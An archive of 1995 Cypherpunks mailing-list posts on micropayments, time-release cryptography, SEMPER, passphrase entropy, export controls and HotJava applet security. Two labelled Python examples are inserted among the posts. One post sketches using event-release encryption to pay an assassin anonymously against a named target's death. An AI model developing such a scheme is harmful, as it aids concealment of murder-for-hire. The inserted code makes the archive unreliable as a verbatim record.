> "packaged up" into something like a magazine before
> individuals can get any profit. a new system may allow
> people to be compensated directly for things that are
> hard to quantify.

This *is* part of the point, V.  Physical manufacture and
distribution of printed magazines have inherent floor costs
and necessary economies of scale that are blown away in
electronic media on the Web.  Just plug in a way for quick 
and easy micropayment and the real revolution will be off 
and running.

>  how much was Markoff's last article worth in the NYT?
> that's impossible to figure out. but if you had a
> microcurrency, you can calculate exactly how much money
> people sent to Markoff for his last article. say, across
> the world, it totalled $843.16. such a sum is not
> inconceivable. and over time it would be enough for him
> to make a salary over the whole year on, perhaps!! I'm
> arguing that this is increasingly going to become VIABLE
> over the next few years with cyberspace and
> microcurrency.

Yes, but not with payment after the fact on the honor
system.  Sit down with *any* of the numerous vendors from
whom you presently buy living space, food, municipal
services, phone service, Internet access, car repairs,
etc., and try convincing them that you should get the
product first, and if you like it you will pay. Later. 
Right.

> the microcurrency situation can even be set up in a
> company. "whoever codes this computer problem will
> receive [x] dollars from the company". the whole economic
> system becomes a fluid, pulsing entity that filters down
> to the tiniest fraction of value and gives each
> individual a quantitative value on his contribution.
> companies talk about "incentive systems" today, but
> perhaps the entire economy will become an enormous
> incentive system in this way in the future!!

I believe this is called "The Free Market," and it has
little to do with any concept of "pay what you think it's
worth after you use it."  The Internet is exploding in
part because it is the *only* free market in the world,
though a market in tenuous and vaporous ideas and
information propagated for many reasons other than direct
pecuniary benefit.  A micropayment mechanism will allow
the net to mature into a fully functioning free market in
information and services of value on which many of the
participants will support themselves.  Many of those
products and services do not presently exist as such. 

"Companies" will be quite virtual and non-geocentric, and
will form and disband in the ether. Too, everyone's
low-cost opinion soapbox will sprout a 1-cent sign on it,
and the ones with something to say that others want to read
will make something on their expression of thoughts,
research, and other information while the ones no one cares
to pay for will wither or preach to themselves.

> in this system, ultimately, I think the whole concept
> that someone "buys a product" will dissolve into the
> idea that "one rewards intellectual productivity to bring
> more of the same". it's as fundamental and intuitive as
> the difference between atoms and bits. 

I disagree.  I believe you're right about the imminent
revolution that will take off when the micropayment
mechanism falls into place, and several of the
underpinnings you present in support of that view, but I
think you've misread what this is about and where it's
going.

The crypto relevance is that everything is in place for 
profound new growth in a new form of commerce, awaiting 
only an effective mechanism that will allow one to make a 
fraction-of-a-second decision and click on something to at 
once authorize a micropayment and navigate somewhere.  Web 
page designers will work out how to best use it and how to 
package the information it buys.  Storable 
pre-authorization tokens would be nice, so that one can 
make a decision that persists through subsequent accesses 
and only pops up for review if the price changes.  And it's 
got to be smooth enough for Grandma to use it.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sat, 11 Nov 95 02:31:17 PST
To: cypherpunks@toad.com
Subject: Noise and the Zen of making it go away
Message-ID: <199511111029.DAA00758@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Win95 A Hacker's Net Dream
Windows 95 Is A Hacker's Dream Over The Internet

>Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
>with the Internet, could be a dream made in hacker
>heaven. From seasoned propeller heads Newsbytes has
>contacted, it looks like Windows 95 could be more of
>a security nightmare than was first thought.

[snip]

From: an407769@anon.penet.fi (jerry the golden retriever)
Reply-To: an407769@anon.penet.fi
Date: Sat, 11 Nov 1995 06:29:46 UTC

>Windows 95 Is A Hacker's Dream Over The Internet
>CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
>Internet, could be a dream made in hacker heaven. From seasoned propeller
>heads Newsbytes has contacted, it looks like Windows 95 could be more of a
>security nightmare than was first thought.

Gee, somebody not been reading the list lately?

I think it's true, the list has become the fast lane to dump junk into.

Re the idea of making cpunks subscriber only- that would solve a few
problems, and people could post anonymously if a separate address were
rigged up ("security through obscurity") as a subscribed address that
throws away anything from cpunks and forwards everything else to cpunks.
The idea being, of course, that if you're not close enough to the action
to know what the current anon-routing address is, you should go away.

At least the bulk of the conspiracypunk stuff has gone away.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMKR6icLa+QKZS485AQHiFQMAlil+qYChoLhIkqxjlTvSiZacgHPHAGOx
BnauPARLTrO/MelBq2/p4gLkiYGBN6Z4Ut5wy0kZVpkRlDcDPewnhOEMZHZMZAsM
JbI79tkVZrTGTRUmwBQ2GlKctYbayodC
=HQsn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous.ReMailer@f21.n216.z1.fidonet.org (Anonymous ReMailer)
Date: Sat, 11 Nov 95 19:32:32 PST
To: cypherpunks@toad.com
Subject: [NOISE] The State will wither away?
Message-ID: <c8c_9511112201@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



Dale Worley (worley@world.std.com):
>It has become fashionable these days to say "The government can't suppress
><whatever>", usually with the smug implication that the speaker is getting
>away with <whatever>, and thus is more studly than the government.  However,
>these people are almost always wrong.  The correct statement is "The
>government isn't willing to expend the effort to suppress <whatever>."
>Anyone who wishes to disprove this is invited to sell heroin in Singapore.
Hey Duncan Frisell! Any kind words for this guy AFA risk assessment?

=================================================
This message has been forwarded by an anonymous remailer.  It is not from
where it appears.  For more information, send a message to HELP at 1:216/21.

--- ReMail RML00.03




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 11 Nov 95 14:02:28 PST
To: ses@tipper.oit.unc.edu
Subject: Re: Who needs time vaults anyway?
Message-ID: <9511112202.AA06738@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As for real time-release - how about just using conventional encryption, 
> and require it to be brute-forced?
> 
> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 

The problem here is that it is probabilistic when they are 
going to be able to unlock it.  If the search space will take a
total of 10 years to exhaustively search, there is a 50% chance
that they will find the key within 5 years, 10% chance that it
will be found in 1 year, etc.  So, if you are lucky, it will
be found in about the time you want it to be.  If you aren't it
will be found in a few milli-seconds.

There is also the problem that your intended recipient will
need to expend just as much work as your adversary to decrypt
the message.  This might not be a disadvantage in the case of 
a "broadcast" message, but otherwise it might be.

Good idea - but I would say not practical....
Now, if we just had an object between 1 and 10 light years away 
that you could bounce lasers off of...... ;-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
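
The unlock-time arithmetic from the message above, as an added example that is not part of the original post. It reproduces the 50% and 10% figures for a constant-speed search and goes further by modelling the quoted "inverse of Moore's law" idea; the trial rate of 1e9 keys/second, the 1.5-year doubling period and the 1000x adversary are assumed values.

```python
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def work_done(t_years, rate0, doubling_years=None):
    """Keys an attacker has tried after t_years.

    rate0 is the trial rate in keys/second at t = 0 (assumed value).
    doubling_years=None models constant speed; a number models hardware
    whose speed doubles every doubling_years (a Moore's-law assumption).
    """
    base = rate0 * SECONDS_PER_YEAR
    if doubling_years is None:
        return base * t_years
    k = math.log(2) / doubling_years
    return base * (math.exp(k * t_years) - 1) / k


def key_bits_for_release(t_release, rate0, doubling_years=None):
    """Smallest key length whose whole keyspace takes at least t_release
    years to exhaust. Key sizes are whole bits, so the work can overshoot
    the wanted amount by up to a factor of two."""
    return math.ceil(math.log2(work_done(t_release, rate0, doubling_years)))


def p_found_by(t_years, keyspace, rate0, doubling_years=None):
    """Chance the key has been hit by t_years. The key is uniform in the
    keyspace, so this is the fraction of the keyspace searched so far."""
    return min(1.0, work_done(t_years, rate0, doubling_years) / keyspace)


def years_until(p, keyspace, rate0, doubling_years=None):
    """Inverse of p_found_by: years until the chance of success reaches p."""
    target = p * keyspace
    base = rate0 * SECONDS_PER_YEAR
    if doubling_years is None:
        return target / base
    k = math.log(2) / doubling_years
    return math.log1p(target * k / base) / k


def report(t_release=10.0, rate0=1e9, doubling_years=1.5):
    """Compare both speed models for a lock meant to last t_release years."""
    rows = []
    for label, d in (("constant speed", None), ("doubling", doubling_years)):
        # Idealised keyspace that is exhausted exactly at t_release.
        space = work_done(t_release, rate0, d)
        rows.append({
            "model": label,
            "key_bits": key_bits_for_release(t_release, rate0, d),
            "p_open_after_1y": p_found_by(1, space, rate0, d),
            "p_open_after_5y": p_found_by(5, space, rate0, d),
            "median_years": years_until(0.5, space, rate0, d),
            # Same lock against an opponent with 1000x the assumed hardware.
            "exhausted_by_1000x_years": years_until(1.0, space, 1000 * rate0, d),
        })
    return rows


if __name__ == "__main__":
    for row in report():
        print(row)
```

Either way the opening date is a distribution rather than a point, and the intended recipient draws from that distribution with the same hardware assumptions as everyone else.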





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:15:21 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <483l88$1f0@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111953.MAA26503@nagina.cs.colorado.edu>,
Bryce <wilcoxb@nagina.cs.colorado.edu> wrote:
> A single station could serve up multiple pieces.  It would only
> reveal the k piece if the querying agent can prove that he has the 
> k-1 piece.  Of course if the total number of stations is small then 
> the "physically move the pieces" trick might work.

But you're back to trusting an agent or device not to reveal a secret.
What have you gained?

The point about moving the elements of the message physically apart has
merit, though.  So the one-time pad of timerel, the ideally secure but
unworkable model, is to encrypt your message with an OTP, then securely
transport the pad and location to points that are $ct$ metres apart,
where $t$ is the length of time you want to keep your message secret.
You could do this with a reflector $ct/2$ metres away, assuming your
opponent and you are in the same location.

I suppose this could be useful for very short-term applications (for
reference, the diameter of the solar system is about 5.4 light-hours),
but like the OTP, its application is limited.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVYPeyjYMb1RsVfAQFvnAP9H7KfW6pDxvHJF2lIucJyuHX8W2Adrxbd
X5rawyQctlAWwRcef6JIPxHcUuL6uznW7bMXrDQMIzDjQMQ/Rb9SdxKdncU0sNQ3
kEuoCKI0r7FJtRS5fSByB6TyQ9dCJJGVRed7P9KVzjP6bCk7Ri889SfNLBd583Kp
INOMxDJ0sDY=
=LtqD
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:25:29 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <483lqg$1kt@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02120d05accab753260f@[199.0.65.105]>,
Robert Hettinga <rah@shipwright.com> wrote:
> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Note that with event-release crypto, the houses could make a public key
available, with the secret key to be held until the death of Tom Target.
That key pair could be used by any of its anonymous buyers while the
crypto house remained ignorant not only of the content and authorship
of the messages, but even of the messages' existence -- nothing at all
to subpoena.  The same key could be used by Tom to encrypt his will, by
the assassin's employer to encrypt the payment, and by anyone to place
a bet on whether Tom will die within a certain period of time (by using
ecash that expires, like Digicash).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVaheyjYMb1RsVfAQEf7wP+OBRVv0UaoO6TLOcCHkwnMF8fMBFc2X3P
8fNV+ICtgWZwp+Bso58h3ocbyx9ilNOhI5l67JG4Oio+84gAnGpWS392KuXu84un
ROpO5ityE0Vhb//ToreVdQVCMvvSsO9cNOQCtFN4v9z/H+YD9YlE0yjp9fTsa32M
th9WA86OmbM=
=V97C
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 12 Nov 95 07:59:14 PST
To: cypherpunks@toad.com
Subject: SEMPER
Message-ID: <199511121558.HAA27914@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


And now for something completely different, a Euro-centric plan for Net
digital commerce.

Haven't had a chance to look at the URL yet, but obviously crypto-relevant...

Joel
----------
Development of Electronic Marketplace:
				   
				   
		      EUROPEAN COMMISSION FUNDS
		       FIRST OPEN SOLUTION FOR
		  SECURE COMMERCE OVER THE INTERNET
				   
			    PRESS RELEASE
                              

Zürich, November 2nd, 1995:

     Backed by the European Commission, a consortium of 20 partners
from European industry and academia has embarked on a research project
to develop the fundamentals for secure electronic commerce.
     The goal of the 9-million ECU (approx. 14 million CHF) project,
SEMPER (Secure Electronic Marketplace for Europe), is to provide the
first open and comprehensive solutions for secure commerce over the
Internet and other public information networks.


A wide range of businesses are rapidly moving to explore the huge
potential of networked information systems, especially with the
Internet-based WWW (World-wide Web). The Internet, which already
connects more than 3 million computers and a substantially larger
number of users, is growing at a breathtaking pace with thousands of
newcomers every day.

Although the Internet has its roots in academia and is still dominated
by free-of-charge information, dramatic changes are expected in the
near future. For instance, the WWW will be used for a wide variety of
electronic commerce such as on-line trade or delivery of advanced
multimedia information services. The evolution of broadband networks
and "information highways" will intensify this trend.

The need for secure transactions in this new business environment,
which involves networks available to the general public, has triggered
a number of related efforts.  These initial developments are based
almost exclusively in the US and most of them are limited to
proprietary, or otherwise closed solutions, involving only electronic
payment issues. In contrast, SEMPER is directed towards a
comprehensive solution for secure electronic commerce, considering
legal, commercial, social, and technical requirements as well as
different options for an electronic marketplace.

Consistent with its broader goals, the SEMPER project will be managed
by an interdisciplinary team of experts from the academic, industrial
and general business environment in Europe. The team includes
representatives of the social sciences, finance, retail, publishing,
as well as information and telecommunication technology.

The first of the three one-year phases will address a coherent
security model and a generic, open security architecture for the
electronic marketplace. This architecture will be independent of
specific hardware, software, or network architectures. The most
fundamental electronic commerce services, such as secure offering,
order, payment and information delivery, will also be integrated in
the first phase.

Subsequent phases will concentrate on more advanced services. These
will include fair exchange of documents, credentials, advanced
document processing, notary services and multimedia-specific security
services, such as protection of intellectual property
rights. Multi-party security and protection of user's privacy will
receive prime attention. SEMPER will use and integrate existing
architectures, tools, and services where appropriate.

Early trials will be provided for WWW, and subsequent tests performed
on ATM-based broadband networks to demonstrate the broad applicability
of SEMPER's architecture and services.

The SEMPER project is part of the Advanced Communication Technologies
and Services (ACTS) research program established by the European
Commission Directorate General XIII for 1994-1998. ACTS is the
follow-on program for Research on Advanced Communications in Europe
(RACE) 1987-1994. The project will establish a Special Interest Group
for Secure Electronic Commerce (SIGSEC) which will make results
available to all interested parties, including standardisation bodies,
and will co-ordinate related projects, in particular those funded by
the European Commission.

IBM's Zurich Research Laboratory will provide the technical leadership
for the SEMPER project, and IBM France will act as co-ordinator. The
other members of the consortium are Cryptomathic (DK), DigiCash (NL),
EUROCOM EXPERTISE (GR), Europay International (B), FOGRA
Forschungsgesellschaft Druck (D), GMD - German National Research
Center for Information Technology (D), IBM European Networking Center
(D), INTRACOM (GR), KPN Research (NL), Otto-Versand (D), r3 security
engineering (CH), SEPT (F), Stichting Mathematisch Centrum / CWI (NL),
University of Freiburg (D), University of Hildesheim (D). Banksys (B),
Banque Generale du Luxembourg (L) and Telekurs (CH) are associated
with SEMPER.

For more information please contact

     Matthias Schunter                    Philippe Delaoutre
     Universitaet Hildesheim              IBM France
     Mail: schunter@rz.uni-hildesheim.de  Mail: FRIBMSPK@IBM.COM
     Tel. + 49 5121 883 788               Tel. + 33 1 49 05 61 12
     Fax  + 49 5121 883 732               Fax  + 33 1 47 68 40 33

or see

     <http://semper.darmstadt.gmd.de/~semper>
or   <http://www.zurich.ibm.com/Technology/Security/extern/semper/>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 12 Nov 95 08:02:33 PST
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <4uigeD3w165w@left.webcasters.com>
Message-ID: <B3igeD4w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: left!jgrubs
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Newsgroups: alt.security.pgp
Subject: Re: POTP Security
Message-ID: <4uigeD3w165w@left.webcasters.com>
Date: Sun, 12 Nov 95 09:17:02 EST
References: <70LDeD1w165w@left.webcasters.com>
Reply-To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Organization: WebCasters(tm)

jgrubs@left.webcasters.com (Jim Grubs (W8GRT)) writes:

> 
> What level of security does this cute, little puppy provide???
> 

Summary of e-mail responses >--> POOR TO NONE.

Thanks, everyone.



--
                               WebCasters(tm)
      James C. Grubs                             jgrubs@webcasters.com
      6817 Maplewood Avenue                         Tel.: 419-882-2697
      Sylvania, OH 43560                             Fax: 419-885-2814
        Internet consulting, HTML programming, Information brokering
                   http:://www.webcasters.com/webcasters/
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaana Segerberg <spjapo@uta.fi>
Date: Sun, 12 Nov 95 09:47:46 PST
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199511121747.TAA16827@uta.fi>
MIME-Version: 1.0
Content-Type: text/plain




Pornography Server

----------------------------------------------------------------------------

   *  To: Cypherpunks Mailing List <cypherpunks@toad.com>
   *  Subject: Pornography Server
   *  From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
   *  Date: Sun, 13 Feb 1994 12:23:28 -0600 (CST)

----------------------------------------------------------------------------

In response to the posting about setting up a pornography server (Sorry,
I'm afraid I deleted the specific message so I cannot remember who you
was :-).

That is certainly a way for people to get and use PGP and to get used to the
remailers.  It would get a lot of heavy use as well.  Now, if there was a
way to batch mailings (so that if, say, six people ordered one item, it
would be sent as one letter to all six instead of six different letters,
with precedence set to bulk), that would help even more.

Now, there are also some practical considerations as well.  What
materials do you archive?  If you put up pictures (gif or jpeg), you will
be talking about tremendous amounts of traffic.  Once they are uuencoded,
even with compression, they can be huge.  If you limit yourself to things
such as stories and the like, you will have less traffic, but also less
use.

There is also the legal side of distributing pornography.   Interstate
transfer is naughty and with Al Gore's Information-Superhighway Patrol,
it will raise some very political issues (but, by using a decent blind
system, for all the patrol knows, the distributor might be in the
recipient's state).

Also, and this is really just an interface issue, scripts should be
developed that will automate the retrieval process (ie, build and submit
the mail message).  These would be similar to the hop.mail or anon.mail
scripts, but would be custom to the pornography server.

For example:
        It begins with an input for the file to be retrieved.
        It will continue prompting for that until the person enters a
                null (or 'q' or something)
        It will then list (at least) one dozen remailers, and they can
                select one (or take a default, and randomize it.  Or perhaps
                randomize it through >1 remailer, although that decreases
                response time.).
        They will then have to PGP sign their mail message (so that the
                ordering software can verify the person placing the order.
                This is to cut down mail-spoofing to mail-bomb an enemy
                with porn.)
        Encrypt it for the appropriate parties
        Send it on its way.

The server can either reply immediately with the appropriate files, or it
can batch everything up for processing during low-traffic times (I
personally like the first, but don't really care that much).  The mail is
then PGP encrypted back to the recipient (by getting the key from a key
server, or by having the orderee register their key before hand, with the
latter probably being easier, although it does leave a paper trail that
can be examined) and sent out with precedence set to 'bulk' so that
other stuff is more important on the mail links.

It should all be fairly accomplishable with a series of perl and sh
scripts on either end.  The real question is what to offer.

I'll talk more about this from an organizational stand-point if anyone is
interested.  I'm afraid that I'm really not that good a programmer (even
of simple shells) as my field of expertise is in management and other
administrative stuff (but obviously not spelling :-)

____        Robert A. Hayden          <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-             <=>          -=-=-=-=-
 \/  /   Finger for Geek Code Info    <=> In the United States, they
   \/  Finger for PGP 2.3a Public Key <=> first came for us in Colorado...
-=-=-=-=-=-=-=-
(GEEK CODE 1.0.1)  GAT d- -p+(---) c++(++++) l++ u++ e+/* m++(*)@ s-/++
                       n-(---) h+(*) f+ g+ w++ t++ r++ y+(*)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 95 14:04:14 PST
To: Ted Cabeen <cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <acce4e6b00021004573a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 PM 11/14/95, Ted Cabeen wrote:
>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

More of an information theory question than a crypto question. There are no
simple answers to this question, but some examples will help:

The password "foo" is not very good, and "foofoo" is only slightly better.
And "foofoofoo" is slightly better, and so on, to a point. But
"foofoo....foo" is not N times better than a single "foo," because the
_pattern_ is simply described: "repeat "foo" N times." Thus, the information
content or entropy of "foofoofoo....foo" is not N times greater than the
entropy of "foo."

Some dictionary attacks which would trivially find "foo" will not find
"foofoo," or "foofoofoo," etc., so this could be a great help. More
sophisticated dictionary attacks may of course take the 30,000 or so most
common names, words, places, and then do various permutations, reversals,
repetitions, etc.

So this is why there is not likely to be a simple answer to your question.
Repeating words in a passphrase can make the passphrase easier to remember
(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
but with not as much of an increase in entropy as the increased number of
raw characters might otherwise suggest.

Other "heuristics" (simple rules of thumb) for passphrases are contained in
the PGP documents, and in numerous other places: avoid names, add
nonstandard English keyboard characters liberally (even if using real
words), etc. The "best" passphrases, it almost goes without saying, are the
longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
much superior to "%foo%foo".

In the real world, where passphrases must be memorized, "long and random"
is an elusive goal, which has to be weighed against the risk of other
attacks (such as capturing keystrokes with a software monitor, or from afar
with a van Eck antenna, etc.).

Me, I use a nonsense phrase which has meaning to me, with a few garbage
characters added to confuse things further. I don't think my passphrase is
the weak link.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

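Added example (not part of Tim May's message or of the list archive): a rough
description-length estimate in Python showing why a repeated word adds far fewer
bits than its character count suggests. The five-word SAMPLE_WORDS list, the
MAX_REPEAT limit of 16 and the cost model itself are assumptions made here; the
30,000-word dictionary size is the figure quoted in the message above.

```python
import itertools
import math
import string

# Constructed stand-in for an attacker's word list (assumption, not from the post).
SAMPLE_WORDS = {"foo", "the", "quick", "brown", "fox"}
DICTIONARY_SIZE = 30_000  # "the 30,000 or so most common names, words, places"
MAX_REPEAT = 16           # assumption: attacker tries up to 16 repetitions


def smallest_repeating_unit(s):
    """Return (unit, count) with unit * count == s and unit as short as possible."""
    if not s:
        return "", 0
    period = (s + s).find(s, 1)  # first shift at which s lines up with itself
    return s[:period], len(s) // period


def charset_size(s):
    """Size of the smallest union of standard ASCII character pools covering s."""
    pools = (string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation + " ")
    return sum(len(p) for p in pools if any(c in p for c in s)) or 1


def naive_bits(s):
    """Upper bound: every character treated as independent and uniformly random."""
    return len(s) * math.log2(charset_size(s))


def segment(s, words=SAMPLE_WORDS):
    """Split s into the fewest tokens; a token is a dictionary word or one character."""
    best = [[]] + [None] * len(s)  # best[i] is the shortest token list for s[:i]
    for i in range(1, len(s) + 1):
        for j in range(i):
            piece = s[j:i]
            if len(piece) == 1 or piece.lower() in words:
                candidate = best[j] + [piece]
                if best[i] is None or len(candidate) < len(best[i]):
                    best[i] = candidate
    return best[len(s)]


def pattern_bits(s, words=SAMPLE_WORDS):
    """Rough bits needed to describe s as words, literal characters and repeats."""
    if not s:
        return 0.0
    unit, count = smallest_repeating_unit(s)
    if count > 1:
        # Whole string is 'repeat unit N times': pay for the unit, then for N.
        bits = pattern_bits(unit, words) + math.log2(max(MAX_REPEAT, count))
    else:
        per_char = math.log2(charset_size(s))
        bits = 0.0
        for token, run in itertools.groupby(segment(s, words)):
            n = len(list(run))
            bits += math.log2(DICTIONARY_SIZE) if token.lower() in words else per_char
            if n > 1:  # an immediately repeated token costs only the repeat count
                bits += math.log2(max(MAX_REPEAT, n))
    return min(bits, naive_bits(s))  # never claim more than the naive bound


if __name__ == "__main__":
    for phrase in ("foo", "foofoo", "foofoofoo", "thequickbrownfox",
                   "thequickquickbrownfox", "%foo%foo",
                   "7f#qp)djQ10hB%3t+1?U4SVp5"):
        print(f"{phrase:28} naive {naive_bits(phrase):6.1f} bits   "
              f"pattern-aware {pattern_bits(phrase):6.1f} bits")
```

Both figures are estimates under the stated model, useful for comparing
candidate passphrases against each other rather than as absolute strengths.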





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 15 Nov 95 03:41:48 PST
To: jeffb@sware.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142016.VAA00818@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>> For those who were wondering if plug-in crypto hooks were still watched 
>> out for. One wonders how the ietf folks are managing to promote internet-wide
>> standards that are considered unexportable (Are they? What's the deal on 
>> photuris, PEM, ipsec and the rest of them?)

> Does anyone know the ostensible justification for this?  What section of
> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

Luckily, a lot of cryptographic materials are available outside the
United States (see e.g. http://www.cs.hut.fi/crypto for pointers).

If the United States chooses to restrict export of IP security
products, it simply helps create a flourishing network security
and other communications industry in other countries.  There are
already several implementations of the IP security stuff abroad -
including at least one in the former Soviet Union.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 15 Nov 95 04:18:56 PST
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <9511151215.AA20714@all.net>
MIME-Version: 1.0
Content-Type: text


> Alice here ...
...
> My post detailing a structural flaw in Netscape Navigator was announced,
> very quietly, to this list OVER ONE MONTH AGO.  And what has been done
> about it, by AT&T and/or Netscape??  Nothing. 
> 
> AT&T has its reputation attached to this code, as does Deutsche Telecom,
> as does Netscape.  The only "action" they've taken is to info-freeload and
> then do absolutely, positively, definitely ... nothing. 
> 
> Diddly-squat.
> 
> No one has taken any action whatsoever.

On a closely related vein, Sun has announced that they are severely
limiting some functions in HotJava - from Risks-17-45:

: The paper written by the two students at Princeton describes possible
: attacks on the alpha3 HotJava browser, which have all been fixed in JDK
: beta.  Granted, until this week, the source code for JDK beta wasn't
: available, so it's understandable that they analyzed the alpha3 source base.
: 
: We understand people need more information on the security model, and we're
: taking time right now to document the security story more rigorously.  A
: security FAQ, an updated whitepaper, detailed user documentation and
: detailed implementor's documentation are all being worked on.
: 
: ...
: 
: Access Control Lists are greatly restricted in beta,
:         as compared to the situation in the alpha3 HotJava browser. 
:         ACLs are initialized - only once - by the applet security
:         manager, and are not user configurable.
: 
:         For a file not on the access control list, an applet cannot
: 
:         - check for the existence of the file
:         - read the file 
:         - write the file 
:         - check the file type
:         - check if the file is a directory
:         - check the timestamp when the file was last modified
:         - check the file's size
:         - create a directory 
:         - rename the file
:         - list the files in this file (as if it were a directory)
: 
:         Applets cannot
: 
:         - create a FileInputStream 
:         - create a RandomAccessFile, either for reading or writing
:         - Open file descriptors
: 
:   2.  Sockets: 
: 
:         Applets cannot 
: 
:         - Create socket connections other than to its own host
:         - Create a socket factory
: 
:   3.  Loading/linking: 
: 
:         Applets cannot 
: 
:         - Create class loaders
:         - Access a package in the sun.* hierarchy
:         - Define a new class in the java.* hierarchy
:         - Link dynamic libraries using System.loadLibrary()
:         - Disable or override the AppletSecurityManager
: 
:   4.  Process control: 
: 
:         Applets cannot 
: 
:         - Define native methods
:         - Fork processes
:         - Manipulate threads or thread groups outside of the
:           applet's thread group
:         - Exit the virtual machine (e.g., the browser or the appletviewer)
: 
:   5.  awt: 
: 
:         Applets cannot
: 
:         - Create toplevel windows that don't have a warning banner
: 
: ...

I had a rather lengthy discussion with a gentleman from Sun at the CSI
conference last Tuesday night, and this announcement follows many of the
things we discussed very closely.  This kind of consistency between what
people say and what the company published is refreshing, and it restores
my faith in Sun's desire to do things well.  Of course there are still
some problems left unresolved:

:...
: It's very difficult, if not impossible, for a web browser to completely
: prevent denial of service attacks.  The JDK applet API doesn't claim to
: prevent denial of service attacks.  A "denial of service" attack is where
: someone writes an applet whose goal is to consume all available resources on
: your computer, forcing you to kill the browser you're running.  For example,
: someone could write an applet that creates a million pop-up windows.  The
: windows don't do anything, but creating a million of them might use up all
: the virtual memory on your computer and you'd have to kill the web browser
: to reclaim the virtual memory.
: 
: Before people engage in too much wailing and gnashing of teeth about
: how applets have been too severely restricted - 
: 
: We want to enable applets to do interesting things, including making
: socket connections, and reading and writing to the file system.  One
